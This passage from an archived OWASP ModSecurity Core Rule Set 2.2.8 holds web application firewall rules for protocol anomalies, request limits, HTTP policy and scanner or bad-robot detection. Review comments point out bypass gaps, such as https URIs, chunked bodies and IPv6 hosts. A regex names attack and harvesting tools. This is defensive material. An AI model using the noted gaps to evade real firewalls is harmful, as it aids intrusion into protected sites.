# NOTE Apache blocks such access by default if not set as a proxy. The rule is
# included in case Apache proxy is misconfigured.
# NOTE There are some clients (mobile devices) that will send a full URI even when connecting to
# your local application and this rule allows it.
# NOTE Need to have UseCanonicalName On in Apache config to properly set the SERVER_NAME variable.
# If you have set UseCanonicalName, then you can uncomment this rule.
#
# -=[ Rule Logic ]=-
# This chained rule first inspects the URI to see if a full domain name is specified.
# If it is, then this data is compared against the Canonical SERVER_NAME. If it does
# not match, then the client is making a request for an off-site location.
#
# The two rules below are shipped commented out.
# NOTE(review): the chained test is a prefix comparison against the literal
# string http://%{SERVER_NAME}. A full URI using https:// never has that
# prefix, and the comparison does not check where the host name ends.
# Review both points before enabling the rule.
#
#SecRule REQUEST_URI_RAW "^\w+:/" "chain,phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'6',accuracy:'8',t:none,block,msg:'Proxy access attempt',severity:'3',id:'960014',tag:'OWASP_CRS/PROTOCOL_VIOLATION/PROXY_ACCESS'"
#SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/PROXY_ACCESS-%{matched_var_name}=%{matched_var}"

#
# Restrict type of characters sent
# NOTE In order to be broad and support localized applications this rule
# only validates that NULL is not used.
#
# The strict policy version also validates that protocol and application
# generated fields are limited to printable ASCII.
#
# -=[ Rule Logic ]=-
# Rule 960901 uses the @validateByteRange operator with the range 1-255 to
# look for NUL bytes in ARGS, ARGS_NAMES and REQUEST_HEADERS (the Referer
# header is excluded); t:urlDecodeUni is applied before the check.
# Rule 960018 runs only when TX:PARANOID_MODE equals 1 and then requires the
# listed variables to stay within the byte range 32-126.
#
# -=[ References ]=-
# http://i-technica.com/whitestuff/asciichart.html
#
SecRule ARGS|ARGS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer "@validateByteRange 1-255" \
        "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',block,msg:'Invalid character in request',id:'960901',tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',severity:'3',t:none,t:urlDecodeUni,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/EVASION-%{matched_var_name}=%{matched_var}"

SecRule TX:PARANOID_MODE "@eq 1" "chain,phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'8',accuracy:'7',block,msg:'Invalid character in request',id:'960018',tag:'OWASP_CRS/PROTOCOL_VIOLATION/EVASION',severity:'3',t:none,t:urlDecodeUni"
        SecRule REQUEST_URI|REQUEST_BODY|REQUEST_HEADERS_NAMES|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|TX:HPP_DATA \
                "@validateByteRange 32-126" \
"t:urlDecodeUni,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.error_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/EVASION-%{matched_var_name}=%{matched_var}" �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_21_protocol_anomalies.conf������0000664�0000000�0000000�00000015402�12164572564�0033212�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # Some common HTTP usage patterns are indicative of attacks but may also be used by non-browsers for legitimate uses. # # Do not accept requests without common headers. # All normal web browsers include Host, User-Agent and Accept headers. # Implies either an attacker or a legitimate automation client. # # # Missing/Empty Host Header # # -=[ Rule Logic ]=- # These rules will first check to see if a Host header is present. # The second check is to see if a Host header exists but is empty. 
#
# Rule 960008 counts Host headers; when there is none it scores the request
# and uses skipAfter:END_HOST_CHECK to jump over the empty-value test.
# Rule 960007 matches a Host header that is present but has an empty value.
#
SecMarker BEGIN_HOST_CHECK

        SecRule &REQUEST_HEADERS:Host "@eq 0" \
                "skipAfter:END_HOST_CHECK,phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,block,msg:'Request Missing a Host Header',id:'960008',tag:'OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_HOST',tag:'WASCTC/WASC-21',tag:'OWASP_TOP_10/A7',tag:'PCI/6.5.10',severity:'4',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER-%{matched_var_name}=%{matched_var}"
        SecRule REQUEST_HEADERS:Host "^$" \
                "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,block,msg:'Empty Host Header',id:'960007',tag:'OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_HOST',severity:'4',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER-%{matched_var_name}=%{matched_var}"

SecMarker END_HOST_CHECK

#
# Missing/Empty Accept Header
#
# -=[ Rule Logic ]=-
# These rules will first check to see if an Accept header is present.
# The second check is to see if an Accept header exists but is empty.
#
# Both chains start with a REQUEST_METHOD test, so requests using the
# OPTIONS method are not checked for an Accept header.
# Rule 960015 matches when no Accept header is present and then skips to
# END_ACCEPT_CHECK; rule 960021 matches an Accept header with an empty value.
# A match adds the notice anomaly score.
#
SecMarker BEGIN_ACCEPT_CHECK

        SecRule REQUEST_METHOD "!^OPTIONS$" \
                "skipAfter:END_ACCEPT_CHECK,chain,phase:2,rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,block,msg:'Request Missing an Accept Header',severity:'5',id:'960015',tag:'OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_ACCEPT',tag:'WASCTC/WASC-21',tag:'OWASP_TOP_10/A7',tag:'PCI/6.5.10'"
                SecRule &REQUEST_HEADERS:Accept "@eq 0" "t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER-%{matched_var_name}=%{matched_var}"
        SecRule REQUEST_METHOD "!^OPTIONS$" \
                "chain,phase:2,rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,block,msg:'Request Has an Empty Accept Header',severity:'5',id:'960021',tag:'OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_ACCEPT'"
                SecRule REQUEST_HEADERS:Accept "^$" "t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER-%{matched_var_name}=%{matched_var}"

SecMarker END_ACCEPT_CHECK

#
# Missing/Empty User-Agent Header
#
# -=[ Rule Logic ]=-
# These rules will first check to see if a User-Agent header is present.
# The second check is to see if a User-Agent header exists but is empty.
#
# Rule 960009 counts User-Agent headers; when there is none it scores the
# request (notice level) and skips to END_UA_CHECK. Rule 960006 matches a
# User-Agent header that is present but empty.
#
SecMarker BEGIN_UA_CHECK

        SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \
                "skipAfter:END_UA_CHECK,phase:2,rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,block,msg:'Request Missing a User Agent Header',id:'960009',tag:'OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_UA',tag:'WASCTC/WASC-21',tag:'OWASP_TOP_10/A7',tag:'PCI/6.5.10',severity:'5',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER-%{matched_var_name}=%{matched_var}"
        SecRule REQUEST_HEADERS:User-Agent "^$" \
                "phase:2,t:none,block,msg:'Empty User Agent Header',id:'960006',rev:'1',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',tag:'OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_UA',severity:'5',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER-%{matched_var_name}=%{matched_var}"

SecMarker END_UA_CHECK

#
# Missing Content-Type Header with Request Body
#
# -=[ Rule Logic ]=-
# These rules will first check to see if a Content-Type header is missing.
# The second check is to see if a Content-Length header is present and its
# value is anything other than exactly 0. If the Content-Length header contains other data
# then this means that there is a request body and the RFC states that there
# MUST be a Content-Type header so that the app knows how to parse the data.
#
# Rule 960904 runs in phase:1. When the chain matches it also sets
# ctl:forceRequestBodyVariable=On, which asks ModSecurity to populate
# REQUEST_BODY even though no Content-Type selected a body processor.
# NOTE(review): the second test reads Content-Length only, so a body sent
# without that header (chunked transfer coding) does not reach it - confirm.
#
SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \
        "chain,phase:1,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,block,msg:'Request Containing Content, but Missing Content-Type header',id:'960904',severity:'5'"
        SecRule REQUEST_HEADERS:Content-Length "!^0$" "t:none,ctl:forceRequestBodyVariable=On,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER-%{matched_var_name}=%{matched_var}"

# Check that the host header is not an IP address
# This is not an HTTP RFC violation but it is indicative of automated client access.
# Many web-based worms propagate by scanning IP address blocks.
#
# -=[ Rule Logic ]=-
# This rule triggers if the Host header consists only of digits, dots and
# colons (a numeric address with an optional port).
# NOTE(review): square brackets are not in the character class, so a
# bracketed IPv6 literal in the Host header does not match this rule.
# NOTE(review): the tag uses OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST while the
# stored tx variable name uses OWASP_CRS/POLICY/IP_HOST - confirm which
# category downstream correlation expects.
#
# -=[ References ]=-
# http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx
#
SecRule REQUEST_HEADERS:Host "^[\d.:]+$" "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,block,msg:'Host header is a numeric IP address',logdata:'%{matched_var}',severity:'4',id:'960017',tag:'OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST',tag:'WASCTC/WASC-21',tag:'OWASP_TOP_10/A7',tag:'PCI/6.5.10',tag:'http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/IP_HOST-%{matched_var_name}=%{matched_var}"

# Log a security event when the request is rejected by apache
#
# You must patch mod_unique_id for this to work correctly.
See the following # mod-security-users mail-list post for the patch details - # http://article.gmane.org/gmane.comp.apache.mod-security.user/5808 # #SecRule RESPONSE_STATUS ^400$ "t:none,phase:5,chain,pass,msg:'Invalid request',id:'960913',severity:'4'" #SecRule WEBSERVER_ERROR_LOG !ModSecurity "t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.leakage_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/LEAKAGE/ERRORS-%{matched_var_name}=%{matched_var}" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_23_request_limits.conf����������0000664�0000000�0000000�00000007320�12164572564�0032374�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # In most cases, you should expect a certain volume of each a request on your # website. For example, a request with 400 arguments, can be suspicious. # This file creates limitations on the request. # # TODO Look at the rules in this file, and define the sizes you'd like to enforce. 
# Note that most of the rules are commented out by default.
# Uncomment the rules you need
#
# NOTE(review): in this version the rules below are not commented out.
# Each chain starts with a count test (&TX:<NAME> "@eq 1"), so a limit is
# enforced only when the matching tx variable has been defined; presumably
# that is done in the CRS configuration file - confirm for your setup.
# A match adds the notice anomaly score.
#

## -- Arguments limits --

# Limit argument name length
# (t:length turns each argument name into its length before the @gt test)
SecRule &TX:ARG_NAME_LENGTH "@eq 1" "chain,phase:2,t:none,block,msg:'Argument name too long',id:'960209',severity:'4',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',tag:'OWASP_CRS/POLICY/SIZE_LIMIT'"
        SecRule ARGS_NAMES "@gt %{tx.arg_name_length}" "t:none,t:length,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/SIZE_LIMIT-%{matched_var_name}=%{matched_var}"

# Limit argument value length
SecRule &TX:ARG_LENGTH "@eq 1" "chain,phase:2,t:none,block,msg:'Argument value too long',id:'960208',severity:'4',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',tag:'OWASP_CRS/POLICY/SIZE_LIMIT'"
        SecRule ARGS "@gt %{tx.arg_length}" "t:none,t:length,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/SIZE_LIMIT-%{matched_var_name}=%{matched_var}"

# Maximum number of arguments in request limited
# (&ARGS is the number of arguments in the request)
SecRule &TX:MAX_NUM_ARGS "@eq 1" "chain,phase:2,t:none,block,msg:'Too many arguments in request',id:'960335',severity:'4',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',tag:'OWASP_CRS/POLICY/SIZE_LIMIT'"
        SecRule &ARGS "@gt %{tx.max_num_args}" "t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/SIZE_LIMIT-%{matched_var_name}=%{matched_var}"

# Limit arguments total length
SecRule &TX:TOTAL_ARG_LENGTH "@eq 1" "chain,phase:2,t:none,block,msg:'Total arguments size exceeded',id:'960341',severity:'4',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',tag:'OWASP_CRS/POLICY/SIZE_LIMIT'"
        SecRule ARGS_COMBINED_SIZE "@gt %{tx.total_arg_length}" "t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/SIZE_LIMIT-%{matched_var_name}=%{matched_var}"

## -- File
upload limits -- # Individual file size is limited SecRule &TX:MAX_FILE_SIZE "@eq 1" "chain,phase:1,t:none,block,msg:'Uploaded file size too large',id:'960342',severity:'4',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',tag:'OWASP_CRS/POLICY/SIZE_LIMIT'" SecRule REQUEST_HEADERS:Content-Type "@beginsWith multipart/form-data" "chain" SecRule REQUEST_HEADERS:Content-Length "@gt %{tx.max_file_size}" "t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/SIZE_LIMIT-%{matched_var_name}=%{matched_var}" # Combined file size is limited SecRule &TX:COMBINED_FILE_SIZES "@eq 1" "chain,phase:2,t:none,block,msg:'Total uploaded files size too large',id:'960343',severity:'4',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',tag:'OWASP_CRS/POLICY/SIZE_LIMIT'" SecRule FILES_COMBINED_SIZE "@gt %{tx.combined_file_sizes}" "t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.notice_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/SIZE_LIMIT-%{matched_var_name}=%{matched_var}" ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_30_http_policy.conf�������������0000664�0000000�0000000�00000015425�12164572564�0031664�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # 
Copyright (C) 2006-2012 Trustwave All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENCE file for full details.
# ---------------------------------------------------------------

# HTTP policy enforcement
# The HTTP policy enforcement rule set sets limitations on the use of HTTP by clients.
# Few applications require the breadth and depth of the HTTP protocol. On the
# other hand many attacks abuse valid but rare HTTP use patterns. Restricting
# HTTP protocol usage is therefore effective in blocking many
# application layer attacks.
#
# TODO Many automation programs use non standard HTTP requests. While you may
# want to allow some of those, try not to create exceptions only for the
# automated program based on properties such as their source IP address or
# the URL they access.
#

# allow request methods
#
# TODO Most applications only use GET, HEAD, and POST request
# methods. If that is not the case with your environment, you are advised
# to edit the allowed list (tx.allowed_methods) or comment the rule out.
#
# The rule runs in phase:1 and matches when REQUEST_METHOD is not found
# within the tx.allowed_methods string.
# NOTE(review): @within is a substring test against the whole list, not a
# comparison with each list entry - confirm that malformed method tokens
# are rejected by the web server or by another rule.
# NOTE(review): severity:'2' is paired with tx.warning_anomaly_score here;
# confirm that this is the intended score. logdata is also given twice
# with the same value.
#
SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" "phase:1,t:none,block,msg:'Method is not allowed by policy',logdata:'%{matched_var}',severity:'2',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',id:'960032',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}"


# Restrict which content-types we accept.
#
# TODO Most applications support only two types for request bodies
# because that is all browsers know how to produce. If you are using
# automated tools to talk to the application you may be using other
# content types and would want to change the list of supported types.
#
# Note though that ModSecurity parses only three content types:
# application/x-www-form-urlencoded, multipart/form-data request and
# text/xml. The protection provided for any other type is inferior.
#
# TODO There are many applications that are not using multipart/form-data
# types (typically only used for file uploads). This content type
# can be disabled if not used.
#
# NOTE We allow any content type to be specified with GET or HEAD
# because some tools incorrectly supply content type information
# even when the body is not present. There is a rule elsewhere in
# the rule set (id 960011) that prevents GET and HEAD requests from
# having bodies, so we're safe in that respect.
# The method test below also exempts PROPFIND and OPTIONS.
#
# NOTE Use of WebDAV requires "text/xml" content type.
#
# NOTE Philippe Bourcier (pbourcier AT citali DOT com) reports
# applications running on the PocketPC and AvantGo platforms use
# non-standard content types:
#
# M-Business iAnywhere application/x-mal-client-data
# UltraLite iAnywhere application/octet-stream
#
# -=[ Rule Logic ]=-
# For the remaining methods the second rule captures the Content-Type value
# up to the first ';' or whitespace, so parameters such as charset are
# dropped. The third rule matches when that captured value (TX:0) does not
# match the anchored pattern built from tx.allowed_request_content_type.
# A match adds the critical anomaly score and sets
# ctl:forceRequestBodyVariable=On.
# NOTE(review): the tag says ENCODING_NOT_ALLOWED while the stored tx
# variable name says CONTENT_TYPE_NOT_ALLOWED - confirm which one
# downstream correlation expects.
#
SecRule REQUEST_METHOD "!^(?:GET|HEAD|PROPFIND|OPTIONS)$" "phase:1,chain,t:none,block,msg:'Request content type is not allowed by policy',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',id:'960010',tag:'OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED',tag:'WASCTC/WASC-20',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/EE2',tag:'PCI/12.1',severity:'2',logdata:'%{matched_var}'"
        SecRule REQUEST_HEADERS:Content-Type "^([^;\s]+)" "chain,capture"
                SecRule TX:0 "!^%{tx.allowed_request_content_type}$" "t:none,ctl:forceRequestBodyVariable=On,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/CONTENT_TYPE_NOT_ALLOWED-%{matched_var_name}=%{matched_var}"


# Restrict protocol versions.
#
# TODO All modern browsers use HTTP version 1.1. For tight security, allow only
# this version.
#
# NOTE Automation programs, both malicious and non malicious many times use
# other HTTP versions.
If you want to allow a specific automated program
# to use your site, try to create a narrower exception and not allow any
# client to send HTTP requests in a version lower than 1.1
#
# Rule 960034: matches when REQUEST_PROTOCOL is not found within
# %{tx.allowed_http_versions}; on a match it copies the rule message into
# tx.msg and adds tx.warning_anomaly_score to tx.anomaly_score.
# NOTE(review): this check is declared in phase 2, while the method and
# content-type checks earlier in this file run in phase 1. Confirm the later
# phase is intended.
SecRule REQUEST_PROTOCOL "!@within %{tx.allowed_http_versions}" "phase:2,t:none,block,msg:'HTTP protocol version is not allowed by policy',severity:'2',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',id:'960034',tag:'OWASP_CRS/POLICY/PROTOCOL_NOT_ALLOWED',tag:'WASCTC/WASC-21',tag:'OWASP_TOP_10/A6',tag:'PCI/6.5.10',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/PROTOCOL_NOT_ALLOWED-%{matched_var_name}=%{matched_var}"

# Restrict file extension
#
# TODO the list of file extensions below are virtually always considered unsafe
# and not in use in any valid program. If your application uses one of
# these extensions, please remove it from the list of blocked extensions.
# You may need to use ModSecurity Core Rule Set Templates to do so, otherwise
# comment the whole rule.
#
# Rule 960035 (two-rule chain, phase 2): after urlDecodeUni and lowercase, the
# text following the first '.' in REQUEST_BASENAME is captured and stored in
# tx.extension as ".<captured>/". The chain matches when that value is found
# within %{tx.restricted_extensions}, and then adds tx.warning_anomaly_score to
# tx.anomaly_score.
# NOTE(review): the leading '.' and trailing '/' presumably mirror delimiters
# used in tx.restricted_extensions so that partial names do not match; confirm
# against the configured list format.
# NOTE(review): the capture is greedy from the first dot, so a basename with
# several dots is compared as one multi-part suffix, not by its final
# extension. Confirm this is the intended comparison.
SecRule REQUEST_BASENAME "\.(.*)$" "chain,capture,setvar:tx.extension=.%{tx.1}/,phase:2,t:none,t:urlDecodeUni,t:lowercase,block,msg:'URL file extension is restricted by policy',severity:'2',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',id:'960035',tag:'OWASP_CRS/POLICY/EXT_RESTRICTED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A7',tag:'PCI/6.5.10',logdata:'%{TX.0}'"
        SecRule TX:EXTENSION "@within %{tx.restricted_extensions}" "t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/EXT_RESTRICTED-%{matched_var_name}=%{matched_var}"

# Restricted HTTP headers
#
# TODO the list of HTTP headers below are considered unsafe for your environment.
# If your application uses one of these headers, please remove it from
# the list of blocked headers.
You may need to use ModSecurity Core Rule # Set Templates to do so, otherwise comment the whole rule. # SecRule REQUEST_HEADERS_NAMES "^(.*)$" "chain,phase:2,t:none,block,msg:'HTTP header is restricted by policy',rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',id:'960038',tag:'OWASP_CRS/POLICY/HEADER_RESTRICTED',tag:'OWASP_CRS/POLICY/FILES_NOT_ALLOWED',tag:'WASCTC/WASC-21',tag:'OWASP_TOP_10/A7',tag:'PCI/12.1',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A7',tag:'PCI/12.1',severity:'4',logdata:'%{matched_var}',capture,setvar:'tx.header_name=/%{tx.0}/'" SecRule TX:HEADER_NAME "@within %{tx.restricted_headers}" "setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/HEADERS_RESTRICTED-%{matched_var_name}=%{matched_var}" �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/base_rules/modsecurity_crs_35_bad_robots.conf��������������0000664�0000000�0000000�00000012442�12164572564�0031445�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. 
# --------------------------------------------------------------- # # NOTE Bad robots detection is based on checking elements easily # controlled by the client. As such a determined attacker can bypass # those checks. Therefore bad robots detection should not be viewed as # a security mechanism against targeted attacks but rather as a nuisance # reduction, eliminating most of the random attacks against your web # site. SecRule REQUEST_HEADERS:User-Agent "@pmFromFile modsecurity_35_scanners.data" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,t:lowercase,block,msg:'Request Indicates a Security Scanner Scanned the Site',logdata:'%{matched_var}',id:'990002',tag:'OWASP_CRS/AUTOMATION/SECURITY_SCANNER',tag:'WASCTC/WASC-21',tag:'OWASP_TOP_10/A7',tag:'PCI/6.5.10',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/AUTOMATION/SECURITY_SCANNER-%{matched_var_name}=%{matched_var}" SecRule REQUEST_HEADERS_NAMES "\bacunetix-product\b" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,t:lowercase,block,msg:'Request Indicates a Security Scanner Scanned the Site',logdata:'%{matched_var}',id:'990901',tag:'OWASP_CRS/AUTOMATION/SECURITY_SCANNER',tag:'WASCTC/WASC-21',tag:'OWASP_TOP_10/A7',tag:'PCI/6.5.10',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/AUTOMATION/SECURITY_SCANNER-%{matched_var_name}=%{matched_var}" SecRule REQUEST_FILENAME "@pm nessustest appscan_fingerprint" \ "phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,t:lowercase,block,msg:'Request Indicates a Security Scanner Scanned the
Site',logdata:'%{matched_var}',id:'990902',tag:'OWASP_CRS/AUTOMATION/SECURITY_SCANNER',tag:'WASCTC/WASC-21',tag:'OWASP_TOP_10/A7',tag:'PCI/6.5.10',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/AUTOMATION/SECURITY_SCANNER-%{matched_var_name}=%{matched_var}" SecRule REQUEST_HEADERS:User-Agent "@pmFromFile modsecurity_35_bad_robots.data" \ "chain,phase:2,rev:'2',ver:'OWASP_CRS/2.2.8',maturity:'9',accuracy:'9',t:none,block,msg:'Rogue web site crawler',id:'990012',tag:'OWASP_CRS/AUTOMATION/MALICIOUS',tag:'WASCTC/WASC-21',tag:'OWASP_TOP_10/A7',tag:'PCI/6.5.10',severity:'4',capture,logdata:'%{TX.0}'" SecRule REQUEST_HEADERS:User-Agent "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by mail)|(?:(?:altb|ro)o|bandi)t|emailextract?|vulnscan|mole)|lls search ii|p Search 00)|i(?:ndows(?:-update-agent)|se(?:nut)?bot)|ordpress(?: hash grabber|\/4\.01)|3mir)|m(?:o(?:r(?:feus fucking scanner|zilla)|zilla\/3\.mozilla\/2\.01$|siac 1.)|i(?:crosoft (?:internet explorer\/5\.0$|url control)|ssigua)|ailto:craftbot\@yahoo\.com|urzillo compatible)|p(?:ro(?:gram shareware 1\.0\.|duction bot|webwalker)|a(?:nscient\.com|ckrat)|oe-component-client|s(?:ycheclone|urf)|leasecrawl\/1\.|cbrowser|e 